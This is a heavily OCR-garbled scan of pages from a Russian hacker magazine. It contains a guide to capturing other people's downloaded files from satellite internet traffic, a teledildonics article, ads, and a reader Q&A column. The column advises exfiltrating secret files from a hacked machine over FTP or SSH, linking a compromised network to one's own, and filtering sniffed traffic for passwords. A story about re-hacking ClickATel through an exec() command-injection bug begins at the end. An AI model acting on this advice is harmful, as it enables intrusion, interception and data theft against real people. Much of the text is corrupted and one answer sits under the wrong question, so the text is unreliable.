файлов. Чтобы начать работу, необходимо знать параметры одного из 
провайдеров, вещающего со спутника, на который в данный момент он 
настроен. Чтобы убедиться, что такие провайдеры есть вообще, реко- 
мендую сайт уѵуѵуѵ. Іупдзаі. сот. Это сводная база данных по всем спутни- 
кам, которая содержит названия сервисов и параметры их транспонде- 
ров (частоты, символьная скорость, поляризация). Последние, кстати, 
пригодятся тебе во время настройки программы — запомни их. Един- 
ственное, что не указано в этой базе — номера информационных пото- 
ков (РЮ), по которым передаются интернет-данные. Они также необхо- 
димы для ЗкуІЧеІіх, поэтому их придется разыскать. Сделать это можно 
следующим образом: 

Ш Узнать на сайте спутникового провайдера. Обычно такая информа- 
ции находится в разделе «Настройка». 

Ц] Из архива самой лучшей конференции по спутниковому телевидению 
и интернету — ругатісітадзаі.іюпзаі.ги. 

И Просканировать спутниковый поток и вытащить из него номера 
РЮ'ов с помощью специального сканера (уѵуѵуѵ. ргодйѵЬ.сот/рІидіпз.Ыт) 
Далее запускай ЗкуЫеІіх ЕсШог — это специальная оболочка, которая 
позволяет прописать параметры спутникового провайдера, не ковы- 
ряясь в текстовых конфигах программы. Частота, символьная ско- 
рость, поляризация и РЮ'ы к этому моменту должны быть уже извест- 
ны. Просто запиши их в соответствующие поля. В Ргоѵісіег впиши имя 
провайдера, поле 0іЗЕдС/І_ЫВ в большинстве случаев (у тебя ведь не 
установлен мультифид и не используется мотоподвес, верно?) можно 
оставить, как есть. Теперь открой зкупеі.іпі, находящийся в рабочей 
директории программы, и подправь значения параметров сіізк, 
сІіМетр, сІіг_ок — это диск для записи, директория для временного 
хранения данных и папка для скаченных файлов. На этом настройка 
завершена, можно запускать ЗкуЫеІіх. 

Верный признак того, что все работает как надо, — быстро изменяющи- 
еся цифры в верхней части окна программы. Если так оно и есть, зна- 
чит, ЗкуЫеІіх нормально сканирует поток и ищет ценные файлы. Следу- 
ющий важный этап — настройка фильтров. Понятно, что перехватывать 
все файлы подряд — это бред по определению. Очень скоро у тебя 
забьется все свободное место, причем файлами, которые в 
большинстве своем тебе не нужны. Чтобы не выкачивать 
тонны чужого барахла, нажми горячую клавишу Ѳ. Должно 
появиться окно, в котором ты сможешь выбрать интересую- 
щие тебя типы файлов, обозначить их минимальный и мак- 
симальный размер. Настроив фильтры, не забудь их сохра- 
нить (СігІ-5), после чего применить изменения (СігІ-В). Те- 
перь ЗкуІМеІ будет извлекать из потока только те файлы, ко- 
торые тебе по-настоящему интересны, все они будут скла- 
дироваться в директорию, указанную в зкупеі.іпі. 
Эффективность: спутниковый интернет традиционно счита- 
ется самым дешевым. Юзеры охотно тратят мегабайты 
и выкачивают из Сети огромное количество файлов. Среди 
перехваченного можно найти груду интересного (включая 
фильмы!), а можно не найти ничего © 
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как видно из названий файлов, этот бот раздает свежие фильмы, но на французском :( 
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Память 0№2 от &вгпаипд гарантирует высочайшую произво- 
іи-стельиость ПЙрООкЛГіьныХ кдмПыОТЦрСф, серадров и нрутбукро 
Качио йы ІІДіічи *Ф СТОИЛИ перФД Вамъ*, Срвдиі МНШКІЫ эдпрв 
ВОН2 Вы всегда найдете пюдходчщий- вариант. Выбирая ООП2. 
Вы мюяате рвосчнтывать «а вытодные цены и тнкничаскую 
ПОЯДС^жк^, «УУ^в^б^КЭ ІИ1Тррй»МУімыі^и Пірт#4р||МН 

•лі^ѵм. аатзи пд аеті. сот 

Тмнр осдімфйцкрамп 










ЮНИТЫ КРЕАТИФФ КОДИНГ ІІЫІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВРШМ НЬЮСЫ 





044 



Есть контакт! 

В НАШ ВЕК МОБИЛЬНОСТИ ЧЕЛОВЕЧЕСКИЕ 
СВЯЗИ СПЛЕТЕНЫ В ОГРОМНУЮ ПАУТИНУ ИН- 
ТЕРНЕТА, СОТОВЫХ СЕТЕЙ И ЭЛЕКТРИЧЕСКИХ 
ПРОВОДОВ. ЕСЛИ ПЕРВЫЙ ПОЦЕЛУЙ, 
ДЕЙСТВИТЕЛЬНО, МОЖНО СРАВНИТЬ С КО- 
РОТКИМ ЗАМЫКАНИЕМ, ПРИ КОТОРОМ СГОРА- 
ЮТ ВСЕ ПРЕДОХРАНИТЕЛИ, ТО ИНТИМНАЯ ФИ- 
ЗИЧЕСКАЯ БЛИЗОСТЬ, ДОЛЖНО БЫТЬ, ПОХО- 
ЖА НА БЕСПОРЯДОЧНОЕ ЗАМЫКАНИЕ И РАЗ- 
МЫКАНИЕ ЭЛЕКТРИЧЕСКИХ КОНТАКТОВ, КОГ- 
ДА У СОСЕДЕЙ СНИЗУ МИГАЕТ ЛАМПОЧКА. 
СТРЕМИТЕЛЬНОЕ РАЗВИТИЕ ХАЙ-ТЕКА ОБУС- 
ЛОВИЛО ПОЯВЛЕНИЕ ТЕЛЕДИЛЬДОНИКИ — 

«ЖЕЛЕЗНОГО» СЕКСА I Алекс Целых (аІех@ІпапсІуеп1.сот) 



Теледильдоника, или 
оргазм через интернет 

В первой книге о виртуальной реальности, 
изданной в 1991 году, писатель Ховард 
Рейнголд посвятил целую главу введению в 
теледильдонику. Так он называл секс в вир- 
туальной реальности, передачу человечес- 
ких действий и эмоций, характеризующих 
интимную близость, через специальные 
компьютерные технические средства и прог- 
раммное обеспечение. Надев облегающий 
прозрачный костюм, его герои испытывали 
физическую близость за тысячи километров 
друг от друга. При этом воссоздавалась точ- 





МІНаттег — машина для секса 



ная последовательность и частота воздействий на нервные оконча- 
ния партнера, то есть ощущения были такими, какими их задумыва- 
ли. Идиллия, свободная от семейных обязательств и болезней, пере- 
дающихся половым путем. 

[костюм для секса] Практическое воплощение этой фантастичес- 
кой идеи провела в жизнь компания Ѵіѵіб Епіегіаіптепі, которая еще в 
2000 году распространила иллюстрации черного неопренового костю- 
ма с 36 электродами, распределенными по эрогенным зонам. Кликом 
мыши было возможно направить одно из пяти ощущений — щекота- 
ние, укол булавкой, вибрация, тепло или холод — на выбранный сен- 
сор. Грезилась революция «секса по телефону», планировался выпуск 








ОМО с интерактивными программами для владельцев костюмов. Одна- 
ко дальнейшего хода идея не получила. Федеральная комиссия Соеди- 
ненных Штатов по коммуникациям предъявила к новинке такие требо- 
вания по технике безопасности, выполнить которые было физически 
невозможно. И хотя уже была объявлена цена в 170 долларов, костюм 
в руки конечных потребителей так и не попал. 

Сегодня, спустя несколько лет, интерес к «костюмам ощущений» пережи- 
вает новый подъем. Дизайнеры независимо друг от друга экспериментиру- 
ют с «умной» тканью, транслирующей ощущения «телячьих нежностей» на 
расстоянии. Скроенная из такого материала, одежда напичкана сенсорами 
и электроникой, которые воссоздают ощущения физической близости 
партнера. В качестве примера можно привести лайкровую блузку Р+В Нидз 



с многочисленными «микроприводами-сэндвича- 
ми». По каналам ОРВЗ одежда принимает сигна- 
лы сердцебиения и данные о температуре тела 
партнера, а также имитирует прикосновения в зо- 
не плеч, шеи, спины, талии или бедер. В ходе 
многочисленных экспериментов авторами были 
выделены и систематизированы десятки видов 
прикосновений. В итоге, Р+В Ниде способна 
воспроизвести дружеское похлопывание, погла- 
живание и многие другие способы выражения 
эмоций через физический контакт. 

[ріид-апсі-ріау] Альтернативой «костюму 
Рейнголда» является интерфейс ріид-апсі-ріау, 
презентация которого состоялась в 1999 году 
на сайте ЗаІеЗехРІиз.сот, принадлежащем 
іРгіепсІз.пеІ, крупнейшему кэм-бизнесу в интер- 
нете. Адаптер, работающий с большим набо- 
ром «игрушек для взрослых», при цене в 30 — 
100 долларов пользовался хорошим спросом у 
любителей онлайновой «клубнички». Изящным 
кроссплатформенным решением служил обыч- 
ный фотодиод, который крепился на монитор 
при помощи присоски. Партнер вводил ІР-ад- 
рес, коннектился к машине и, двигая ползунки, 
менял яркость квадрата на экране. Чем силь- 
нее была яркость, тем громче ревел вибратор. 
Правда, серьезной технической недоработкой 
оказалось отсутствие ограничителей. В неуме- 
лых руках устройство превращалось в настоя- 
щее орудие пыток. Продажи девайса были при- 
остановлены. 

Примерно в это же время другая компания, 
Оідііаі Зехзаііопз, представила небольшую ко- 
робочку, которая подключалась к стандартно- 
му СОМ-порту. От остальных устройств ВІаск 
Вох отличалось четырьмя входами для штеке- 
ров, что делало возможной работу нескольких 
вибраторов одновременно. От партнера требо- 
валось запустить специальное программное 
обеспечение для чата и ввести уникальный 
идентификатор. Софт позволял объединять 
эрогенные зоны в группы, писать макросы и да- 
вать действиям понятные названия: нежное 
прикосновение, поцелуй, лизание, посасыва- 
ние и т.д. В режиме оргии обрабатывались ко- 
манды сразу от нескольких партнеров. Порног- 
рафические тексты предлагалось размечать 
специальными тэгами так, что при подведении курсора к фразе воспро- 
изводились определенные вибрации. К сожалению, разработка была 
достаточно сырой. Устройство в самый неподходящий момент вдруг пе- 
резагружалось, а софт постоянно вешал интернет-браузер. Немногие 
отважились пережить такой стресс дважды, поэтому продажи устрой- 
ства ВІаск Вох почти так же быстро сошли на нет. 

До наших дней дотянул, пожалуй, единственный аналог ВІаск Вох — 
адаптер Ѵігіиаі Зех МасМпе, выпускаемый компанией Ѵігіиаі Веаіііу 
Іппоѵаііопз ( уѵуѵуѵ.ѵпппоѵаііопз.сот ). Однако помимо высокой цены в 
400 долларов, устройство имеет ряд существенных ограничений. Оно 
работает исключительно с входящей в комплект вакуумной помпой 
для мужского органа и не подразумевает наличие партнера. Этот де- 




ѵігіиаі зех тасЫпе транспортируется в аккурат- 
ном чемоданчике 
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вайе для самоудовлетворения 
включается в І_РТ-порт и реаги- 
рует на сигналы, сопровождаю- 
щие видеотрансляцию с ЭѴЭ. 
Действия актрис на экране синх- 
ронизированы с движениями 
поршня, что должно создавать 
ощущение полной реальности. 
Коллекция видео регулярно об- 
растает новинками, за каждую из 
которых придется выложить по 
40 долларов. Но, судя по обнов- 
лениям на веб-сайте, компания 
уже давно дышит на ладан. 





на командном пункте зіпиіаіог у многих напрочь сносит башню 



[полная реалистичность] С технической точки зрения, всех обскака- 
ла компания Зіпиіаіе Епіегіаіптепі ( ѵѵтѵ.зіпиіаіе.сот ). Устройство ТПе 
Зіпиіаіог состоит из двух беспроводных приемопередатчиков: один подсо- 
единяется к вибратору, второй — к тачке по шине ІІЗВ. Это сразу раздви- 
нуло границы «рабочей зоны» до 20 метров и позволило не путаться в про- 
водах. Движениями вибратора можно управлять с «командного пункта», 
используя мультяшный РІазГі-интерфейс, очень напоминающий видеоигру. 
Такая реализация позволяет «вступать в контакт» с любого устройства, 
имеющего выход в интернет, например, с наладонника Раіт Тгео. Научен- 
ные на ошибках предшественников, авторы предусмотрели некоторые по- 
лезные настройки на принимающей стороне. В частности, можно устано- 
вить предел интенсивности вращения. Последняя разработка компании — 

устройство Іпіегасііѵе 

РІезЫідІіІ, отдающая 
инициативу мужчине. 
Никакого экранного 
интерфейса. Ритмич- 
ные движения телом 
заставляют вибратор 
вращаться быстрее. 
По сути, это практичес- 
кая реализация вы- 
мышленного устрой- 
ства РискІІ-РискМе 
(муи гіи-іте.сот), ко- 
торое работало в пяти- 
дюймовом отсеке сис- 
темного блока. ТГіе 
Зипиіаіог продается по 
цене от 150 долларов 
за базовую модель. 




легендарный РискІІ-РискМе в моделях для 
мужчин и женщин 



Возможностей для апгрейда — мас- 
са. На выбор предлагаются десятки 
интерактивных видеофильмов и 
трехмерных игр, реализующих не- 
вероятные сексуальные фантазии. 

Тем временем, английский инже- 
нер Доминик Кроу продолжает 
работу над экспериментальным 
роботом-манекеном из эластич- 
ного материала. Взят курс на 
ультрареалистичность. Микро- 
моторчики приводят в движение 
части тела, а встроенные дина- 
мики воспроизводят человечес- 
кую речь. Можно и просто надеть 
шлем виртуальной реальности, 
представить девушку своей меч- 
ты и совершенно забыть о том, 
что под тобой обычная резино- 
вая кукла. 

Напомню, что этим летом на 
ЭогкВоІ (ѵѵѵѵѵѵ.сІогкЬоІ.огд) сос- 
тоялся первый открытый сеанс 
теледильдоники, во время кото- 
рого присутствующие управля- 
ли работой адской секс-маши- 
ны "ПігіІІГіатгпег. Механический 
поршень раздирал живую де- 
вушку за 4000 километров от 
зала заседания. Впереди новые 
«извращения» и сенсации. А по- 
ка, не теряя времени, гаси экран и отправляйся к подружке. Она ведь 
уже нашла что-то в любови-моркови с хакером @ 



«2048», МЕРСИ ШЕЛЛИ 

— Меня зовут Элиза Гамильтон. Вам случилось остано- 
виться у моего потаенного уголка, но вы не похожи ни на 
моих детей, ни на моих мужей... хотя последних я помню 
гораздо хуже, ха-ха! Правда, вы немного похожи на Генри. 
Его я помню хорошо, ведь именно из-за него я попала на 
кладбище. Суд оправдал его — но не я. Я-то помню, как 
его бесило мое увлечение мультиканальной теледильдони- 
кой. А эти ежедневные скандалы с угрозами! Эти публич- 
ные обвинения в том, что я демонстрирую свои дигиталии 
всей Сети! Суду, 
видите ли, недос- 
таточно подоб- 
ных улик. Но кто 
же еще, кроме 
Генри, мог внести 
изменения в 
настройки моего 
эробота? Знал, 
негодяй, что у ме- 
ня больное серд- 
це, и что эробот в 
таком режиме 
затрахает меня 
до смерти! 
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Мг. 50 000 пользователей 



по всему миру, 



подключенных удаленно 
без использования ѴРІ\І. 



"Увеличение производительности, достигнутое 
за счет использования ѴѴіпсІоѵѵз Бегѵег 2003 
и ЕхсГіапде Бегѵег 2003, позволяет ІЧІззап 
экономить более $135 миллионов ежегодно". 



Тошихико Суда 

Старший менеджер Л//55ал МоХог Сот рапу, 1X6. 



Сделай себе имя. Вместе с ѴѴіпсіоѵѵб Бегѵег Бузіет. Штат І\ІІ55ап Моіог Сотрапу 
в мире - 50 000 сотрудников. Переход на Місгобоіі:® ѴѴіпсіоѵѵб Бегѵег БуБІепл™ 
позволил организовать для них безопасный удаленный доступ к почте и 
календарям через любое Интернет-соединение без использования ѴРІ\І - 
то есть без лишних неудобств и расходов. Развертывание ѴѴіпсіоѵѵб Бегѵег™ 
2003 и ЕхсЬапде 2003 не просто помогло ІТ-отделу решить поставленную 
главой компании задачу: оптимизировать взаимодействия сотрудников 
ІМІБзап, работающих в разных странах. За счет улучшенной организации 
потока внутренних сообщений компания планирует сэкономить более 
$135 миллионов. Узнайте больше о результатах перехода компании ІМІБзап 
на ѴѴіпсіоѵѵб Бегѵег БуБІет - посетите тісго 50 ^.сот/ги 5 /ѵѵіпсІоѵѵ 55 егѵег 5 у 5 іет 




ѴѴіпсІоѵѵз 
Бегѵег Бузіет 







ВОЗМОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБ- 
ЩИХ ВОПРОСОВ, ВРОДЕ «КАК ВЗЛОМАТЬ 
ИНТЕРНЕТ?», ТЫ ТОЛЬКО ПОТРАТИШЬ ПОЧ- 
ТОВЫЙ ТРАФИК. ТРЯСТИ ИЗ МЕНЯ ФРИШКИ 
(ИНЕТ, ШЕЛЛЫ, КАРТЫ) — НЕ СТОИТ, Я САМ 
ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ. 



РАСКЮММЕІЧТЗ 

ЗісІеХ 

(ІпасЫад @ геаі.хакер.ги) 



О: Расскажи про новый способ добычи кредиток через факс! 

А: На факсе, как и на принтере, можно распечатывать все 
необходимое, в том числе и листинги кредитных карт :). 
Если же речь идет о менее примитивной охоте на креды, 
то я вспомню последний рЫзЫпд-скандал, когда злоу- 
мышленники рассылали спам от имени администрации 
еВау с просьбой заполнить ѵѵеЬ-форму (залить инфу по 



которое позволяет изменять просматриваемые страницы, 
добавлять необходимый ОНТМІ_-код. Установим тулзу, за- 
лив скрипт ( МІр://киги4и.зрутас.сот/зсгірІз/ОтаіІ_Зтагі - 
ОеІе1е_Виііоп.изег.із). Теперь ты заимеешь специальную 
кнопу ЗтагЮеІеІе, которая будет возникать лишь при посе- 
щении страниц ОтаіІ'а. Теперь все мыло можно удалять од- 
ним щелчком, без лазания по меню. 




СО, дату рождения, 33-номер), распечатать оную и отпра- 
вить на ІоІІТгее факс. Пока не известно, сколько ушастых 
повелись на разводку, но сам прецедент использования 
факса — занимателен. 

О: Сколько максимально кредиток удалось украсть хакерам? 

А: Воровством кредиток из карманов и кошельков зани- 
маются карманники, совсем не хакеры. Публично изве- 
стно, что хакеры успели стянуть инфу по 40 миллионам 
аккаунтов из системы процессинга СагсІЗузІетз в мае. 
Как минимум, 68 тысяч карт было снято у МазІегСагсІ, 
сколько живых карт скрывалось за указанными выше 
аккаунтами — не знает никто. Фирма обслуживает бо- 
лее 105 тысяч средних и крупных фирм, вовлеченных в 
торговлю. Подобный случай — далеко не первый в исто- 
рии финансового мошенничества. Так, у Атегігасіе были 
украдены Ьаскир-диски с инфой по 200 тысячам аккаун- 
тов. СШЬапк и Вапк оі Атегіса также потеряли оператив- 
ные записи по 3.9 и 1.2 миллионам аккаунтов. Сейчас 
рассматриваются варианты введения уголовной ответ- 
ственности для работников банков, чьи записи могли по- 
пасть третьим лицам. 

О: Я не хочу, чтобы (ЗтаіІ сохранял все мои емейлы в архив 
после удаления. Как его отучить от этой дурной привычки, 
приучить к мгновенному удалению? 

А: Действительно, на поверхности аккаунта находится лишь 
кнопа «АгсПіѵе», когда как Беіеіе можно достать только из 
хитроумного меню, до которого еще ползти и ползти. Я лично 
решил проблему установкой специального расширения в мой 
РігеРох-браузер — Огеазетопкеу {дгеазетопкеу.тогсіеѵ.огд ) , 



О: Каким вирусом можно заразить интерактивный шелл но- 
вой ѴѴіп Ѵізіа? 

А: Да, не так давно настало время менять имена, и ѴѴіпсІоѵѵз 
І_опдІіогп обратился в Ѵізіа. Среди нововведений операци- 
онки ожидалась и МЗН-система того самого интерактивно- 
го кода, также известная под кличкой Мопаб. Однако не- 
давно стало известно, что нововведение не войдет в основ- 
ную поставку Ѵізі'ы, но будет включено в новый МісгозоК 
ЕхсПапде. Пугаться недавно нашумевшего Мопаб-заража- 
ющего зверя Балот (ѵѵѵѵѵѵ.^-зесиге.сот/ѵ-сІезсз/сІапот.зМтІ) 
не стоит. Бояться следует, когда лукавый заставит поста- 
вить МЗН-тему. 

О: Можно получить срок за ѵѵагбгіѵіпд? 

А: Уже было открыто несколько уголовных дел, в 
которых фигурировало несанкционированное подклю- 
чение к ѴѴі-Рі сети. Однако вовсе не сканирование и 
использование чужого канала стало причиной уголов- 
ки, во всех случаях проблемы происходили из-за даль- 
нейших действий хакеров — захвата сетей и слива за- 
секреченной информации. Недавно же оформилось 
дело, по результатам которого, нарушитель получил 
условный срок и заплатил штраф в размере 500 фун- 
тов стерлингов за эксплуатацию чужого ЬапсІѵѵШі'а без 
ведома хозяина. Перец с польской фамилией просто 
ездил на велосипеде по Лондону, никому не мешал и 
лишь тихонько искал доступ к чужому АР. Решению су- 
да помог Соттипісаііоп Асі, принятый законодателями 
Великобритании в 2003 году. Хоть и было доказано, что 
у ѴѴі-Рі-негодяя не было злого умысла, суд отказался пе- 
ресматривать свой вердикт. 




О: Стал снифать одну сетку, но моментально утонул в потоке дан- 
ных. Как мне получать инфу лишь по нужным сервисам? 

А: Большинство современных сниферов предусматривают 
фильтрацию потока данных, отбор инфы лишь по выбранным 
направлениям. Возьмем, к примеру, популярный сегодня ком- 
мерческий вариант продукта — ЕіИегЗсап Апаіугег {ѵѵѵѵ\ /ѵ.еіііег- 
зсап.сот). Здесь нужно лишь выбрать закладочку РіІІег и ука- 
зать нужный сервис, РТР, к примеру. Для сокращения объема 
данных, складываемых в лог, можно призвать на помощь оп- 
цию ѴѴогбз. С ее помощью будут записываться лишь самые ла- 
комые комбинации слов, добавив нечто, вроде «РАЗЗ». Ана- 
логичным образом решается вопрос и с другими представите- 
лями семейства. 

О: Хочу все пакости творить со съемной флешки-брелка. Можно 
ли туда вкачать целую операционку 

А: Большинство современных сниферов предусматривают фильт- 
рацию потока данных, отбор инфы лишь по выбранным направле- 
ниям. Возьмем, к примеру, популярный сегодня коммерческий ва- 
риант продукта — ЕІПегЗсап Апаіугег {ѵѵѵѵѵѵ.еіііегзсап.сот). Здесь 
нужно лишь выбрать закладочку РіІІег и указать нужный сервис, 
РТР, к примеру. Для сокращения объема данных, складываемых 
в лог, можно призвать на помощь опцию ѴѴогбз. С ее помощью бу- 
дут записываться лишь самые лакомые комбинации слов, доба- 
вив нечто, вроде "РАЗЗ". Аналогичным образом решается вопрос 
и с другими представителями семейства. 

О: Как можно обороняться от рЫзЫпд'а? 

А: Некогда с этим могли получиться проблемы, но уже сегодня 
вопрос решается установкой простой утилиты — РІазІіВооГ Тулза, 
увы, платная и доступная демка оказывается малополезна. Линк 
на рабочую версию обычно можно разыскать на просторах 
ОоодГа. С помощью этой программы ты сможешь сделать флеш- 
ку загрузочной и перетащить туда все ключевые файлы с привыч- 
ного носителя, вроде СЭ. 

О: Подтырил винт с базой данных, но вот беда — там стоит І_іпих, 
а у меня никак руки не доходят поставить эту систему. Можно ли 
как-то перебросить данные оттуда в ѴѴіп? 

А: Вероятно, мы имеем дело с дисковым разделом ех12/ехКЗ, на по- 
мощь может прийти Ргееѵѵаге Ехі2/ЕхіЗ Эгіѵег ( уѵуѵуѵ. із-сігіѵег. огд ) , 
записанный на основе МісгозоТС ІпзІаІІаЫе Рііезузіет ЗЭК. Теперь 
ты сможешь читать «линуксовые» диски и записывать инфу туда. 
Окажется доступным все, кроме изменения прав доступа. 

О: Взломал одну тачку, но доступ имеется лишь по ЗЗН. Как же 
оттуда стащить искомые секретные материалы? 

А: Самый лаконичный способ — использовать встроенный Кр-кли- 
ент, который окажется доступен тебе как локальному пользовате- 
лю. Запустив удаленно клиент, ты сможешь перекачать все необ- 
ходимое на другой Кр-сервер. Вполне подойдет и твоя собствен- 
ная машина, где ты оголишь 21 порт для доступа снаружи. Также 
подойдет работа по схеме Йр оѵег ззіі или зйр, когда через ззИ бу- 
дет протянут обыкновенный Йр-канал, с той лишь разницей, что 
все передаваемые данные окажутся зашифрованы. Существуют 
удобные ѵѵіп-клиенты, которые поддерживают оба варианта свя- 
зи. Долгое время я чередовал ЗесигеРХ ( уѵуѵуѵ. ѵапсіуке. сот ) с 
СиІеРТР Рго(ѵѵѵѵѵѵ.сиІеПр.сот). Оба варианта — шароварные и 
требуют медикаментозного вмешательства :). 

О: Поставил локальный ЗМТР-сервер, но теперь половина моих 
писем не доходит до адресатов. В чем мулька? 

А: Любое действие имеет противодействие, и после массового 
распространения проблемы спама, админы перешли все мыс- 
лимые и немыслимые пределы в борьбе с напастью. Не секрет, 
что весомая доля спама рассылается через «зомбированные» 
компьютеры, на которых и открываются локальные почтовые 
серверы. В подобном случае хост отправителя и ЗМТР оказыва- 
ются одним и тем же. Когда же ты сам, даже не будучи зомби, 
начинаешь посылку писем, спам-фильтры принимают тебя за 
рецидивиста! Если ты рассылаешь письма юзерам одного и то- 
го же сервера, будет логичным нахождение договоренности с 
админами, по которой твой хост будет удален из черного листа 
и занесен в «неприкасаемые». Надеюсь, что объяснил причину 
твоих неполадок. Грамотного решения, помимо отказа от ис- 
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пользования локального почтовика, увы, предложить не могу. 
Чтобы не выглядеть тотальным лузером, предположу, что мо- 
жет помочь наладка ЗЗН-тоннеля через удаленный сервер, ког- 
да конечной точкой станет локальный ЗМТР на твоем хосте. 
При подобном раскладе, хост отправителя и ЗМТР окажутся 
различными, тебя не попалит спам-фильтр. 

О: Взломал одну локалку и у меня родился план — слинковать 
подконтрольную сеть с моей собственной. Какой мост можно 
построить между ними? 

А: Все проблемы людей от того, что они строят стены вместо мос- 
тов. Давай же построим прочный мост между твоей сетью и лю- 
бой другой извне. Существует два главных варианта мостов (по 
одному ответвлению на каждый). Прозрачный мост может быть 
налажен между сетями одинаковой топологии; на мосту будет 
размещена инфа об узлах отправителей и внешних интерфейсах. 
Трансляционные мосты будут в ходу, когда нужно слинковать се- 
ти с различными топологиями. Подварианты — соединение с 
маршрутизацией источника и построение трансляционного моста 
с маршрутизацией источника. Более подробно о поднятии всевоз- 
можных мостов ты сможешь прочесть на ореппеГш. 

О: Как мне забанить несколько ѵѵеЬ-сайтов, чтобы туда не лазали 
юзверы моей сети? 

А: Это можно сделать на уровне ір-роутинга, любой файрвол поз- 
воляет это сделать. Это простой и не требующий движения мыс- 
ли вариант. Его минус в том, что юзерам не будет понятно, како- 
го-такого их не пускают на вызываемый сайт. Ты рискуешь подх- 
ватить десяток ненужных звонков в службу поддержки. Куда кра- 
сивее тема обустраивается при помощи Ргоху-сервера, вроде 
широко известного ЗциісГа ( уѵуѵуѵ. зриісі-сасііе.огд ). На сайте соф- 
тины разлилось бескрайнее море документации, в котором вы- 
лавливается подробное описание требуемого конфига. Сам реа- 
лизовывал тему таким же способом, точно все дрочеры подконт- 
рольной сети получают страничку «Грешник! Ты сгоришь в аду» 
при запросе порнушных сайтов. Подобное можно сбацать и в слу- 
чае других проксов. 

О: Как наиболее оперативно установить одинаковый набор софта 
на сотню-другую машин одновременно? 

А: Если я не точно отвечу на твой вопрос, будет разумным ис- 
кать инфу по ключевым "сПзк+сІопіпд". Задав подобное, я на- 
шел решение в Ьаскир-софте. Так, ты устанавливаешь и наст- 
раиваешь весь софт на одном из писюков, снимаешь Ьаскир- 
ітаде с настроенной машины и потом посредством Асгопіз Тше 
Ітаде 8.0 Епіегргізе Зегѵег {уѵуѵуѵ. асгопіз. сот) разбрасываешь 
снятый образ по сотне-другой выбранных точек сети. Анало- 
гичным набором функций обладает Зутапіес ОИозІ Епіегргізе 
{уѵуѵуѵ. зутапіес. сот). Ключевая опция подобного Ьаскир'а — 
тиііісазі, возможность разброса нужного образа одновременно 
на множество машин. Вариант ипісазі — это апгрейд каждой 
системы по очереди. 

О: Я купил себе Мае и сразу озадачился проблемой. Как мне 
удаленно админить моих юзеров, которые все еще работают 
под виндой? 

А: В битве бобра с ослом побеждает бобро, т.ч. М3 все еще по- 
беждает остальные сіезкіор-системы своим умением вовремя 
приготовить продукт, который поможет совместить несовмес- 
тимое. Прямо на сайте М3 {уѵѵѵѵѵ. тіегозоіі. сот/тас/оіііегргосі- 
исІз/оіІіегргосІисІз.азрх?рісІ=гетоІесІезІ<ІорсІіепІ) ты можешь 
сдуть Мас-релиз клиента известного Ветоіе Эезкіор'а. Теперь, 
не вылезая из Мака, можно админить машины, заряженные 
твоим РЮ. 

О: Правда, что за спам стали убивать? 

А: Пуля виноватого найдет. Весь интернет облетела новость об 
убийстве Вардана Кушнира, 35-летнего руководителя «Центра 
английского разговорного языка», прежде известного, как «Центр 
американского английского». Мотив преступления до сих пор не- 
известен, хотя самые злостные спам-ненавистники выдвигают 
версию, что интернет-провайдеры образовали синдикат и, скинув- 
шись понемногу, наняли безжалостного киллера, чтобы тот изба- 
вил их от ежемесячных потерь, вызванных спам-трафиком из 
«Центра английского» Ѳ / 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20І\ІЕ РЕВВІІМ НЬЮСЫ 



СІіскаІеІІ возвращается 

ОДНАЖДЫ МНЕ ЗАХОТЕЛОСЬ ПРИВЕСТИ СВОИ ДАН- 
НЫЕ В ПОРЯДОК. ДУМАЮ, МНОГИЕ МЕНЯ ПОЙМУТ: ЕС- 
ЛИ НЕ УПОРЯДОЧИВАТЬ ИНФОРМАЦИЮ НЕСКОЛЬКО 
МЕСЯЦЕВ, ТО СТРУКТУРА НАКОПИТЕЛЕЙ ПРЕВРАЩА- 
ЕТСЯ В НЕИЗВЕСТНО ЧТО. ИМЕННО ТАКОЕ МЕСИВО 
ДАВНО ИМЕЛО МЕСТО НА МОЕМ КОМПЬЮТЕРЕ: 



Интересная история 
нового взлома СІіскаІеІІ. сот 

[утерянный комплект сценариев] Обычно, когда роешься в хламе 
данных, то находишь давно утерянную информацию. Так вышло и в этот 
раз: за полчаса уборки я успел обнаружить три трЗ-шки, которые я в по- 
те лица искал месяц назад, пару текстовиков с заснифаными паролями, 
а также несколько увесистых Іаг.дг-архивов, попусту занимающие мес- 
то на моих накопителях. Но это были только цветочки. Мне посчастли- 
вилось найти папку с названием СІіскаІеІІ, в которой находился архивчик 
уѵт /ѵ.іаг.дг. В последнем располагались все ѵѵеЬ-сценарии компании 
Кликатель. Если ты постоянный читатель журнала, то знаешь, что пол- 
года назад мне удалось лихо порутать Клик и отправить на шару 
пару сотен ЗМЗ'ок :). 

Небольшое лирическое отступление: администраторы СІіскаІеІІ приняли 
решительные меры против моего взлома: они заставили всех клиентов 
сменить свои пароли, впоследствии зашифровав их относительно стойким 
алгоритмом МЭ5. Помимо этого, администрация сменила все пассворды 
на закрытые зоны и забанила мои ІР-адреса на центральном брандмауэре :). 
Единственное, что я успел сделать, это спионерить с ѴѴѴѴѴѴ-сервера архив, 
содержащий контент всех абтіп- и риЫіс-сценариев. 

И вот, спустя долгие месяцы, я нашел этот архив. Внутри находились 
две папки: риЫіс и абтіп. Помнится, что благодаря архиву я отыскал 
дырку в скрипте админки, которая позволяла выполнять любые коман- 
ды. На сегодняшний день, по понятным причинам, в админку зайти бы- 
ло проблематично, поэтому было решено испытать удачу в риЫіс-части 
проекта. Я четко помнил, что админский скрипт содержал баг в функ- 
ции ехес(), которой передавались незаэкранированные переменные. 
Поэтому я осуществил поиск подстроки ехес во всех сценариях архива. 
Результат меня просто ошеломил: ехес вызывался в каждом втором 
сценарии. Однако, посмотрев содержимое файлов, я был разочарован: 
все переменные проверялись на наличие специальных символов 
и иных конструкций. Казалось, что программисты подошли к проблеме 
безопасности с умом: на первый взгляд исходники не содержали ни 



В КОРНЕ ДИСКА «ЦЭ» РАСПОЛАГАЛИСЬ ПЯТЬ ИЛИ 
ШЕСТЬ ПАПОК С ИМЕНАМИ ТЕМР1 , 1 1 1 И Т.П. МЕДЛЕН- 
НО НАЧАВ РАЗГРЕБАТЬ МУСОР, Я ДАЖЕ НЕ ПРЕДПО- 
